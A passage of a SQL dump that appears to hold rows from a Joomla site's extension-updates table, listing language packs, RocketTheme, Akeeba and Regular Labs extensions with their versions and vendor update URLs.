Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(22925,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(22926,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(22927,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(22928,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(22930,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22931,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22932,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22933,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22934,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22935,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22936,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22937,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22938,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22939,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22940,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22941,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22942,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22943,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22944,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22945,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22946,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22947,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22948,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22949,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22950,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22951,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22952,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22953,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22954,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22955,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22956,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22957,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22958,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22959,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22960,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22961,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22962,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22963,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22964,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22965,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22966,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22967,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22968,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22969,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22970,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22971,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22972,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22973,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22974,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22975,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22976,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22977,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22978,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22979,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(22980,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22981,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22982,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22983,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22984,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22985,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(22986,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22987,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22988,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22989,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22990,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22991,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22992,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22993,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22994,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22995,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22996,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22997,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22998,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22999,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23000,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23001,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23002,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23003,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23004,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23005,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23006,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23007,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23008,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23009,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23010,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23011,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23012,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23013,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23014,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23015,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23016,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23017,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23018,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23019,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23020,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23021,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23022,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23023,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23024,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23025,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23026,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23027,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23028,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23029,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23030,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23031,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23032,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23033,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23034,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23035,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23036,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23037,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23038,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23039,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23040,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23041,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23042,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23043,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23044,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23045,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23046,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23047,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23048,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23049,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23050,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23051,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23052,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23053,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23054,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23055,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23056,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23057,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23058,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23059,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23060,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23061,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23062,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23063,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23064,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23065,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23066,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23067,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23068,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23069,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23070,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23071,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23072,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23073,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23074,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23075,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23076,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23077,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23078,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23079,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23080,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23081,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23082,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23083,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23084,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23085,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23086,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23087,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23088,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23089,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23090,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23091,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23092,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23093,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23094,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23095,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(23096,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23097,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23098,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23099,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23100,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23101,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(23102,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23103,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23104,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23105,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23106,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23107,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23108,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23109,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23110,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23111,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23112,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23113,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23114,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23115,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23116,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23117,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23118,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23119,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23120,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23121,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23122,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23123,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23124,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23125,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23126,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23127,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23128,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23129,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23130,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23131,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23132,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23133,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23134,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23135,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23136,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23137,3,0,'Serbian 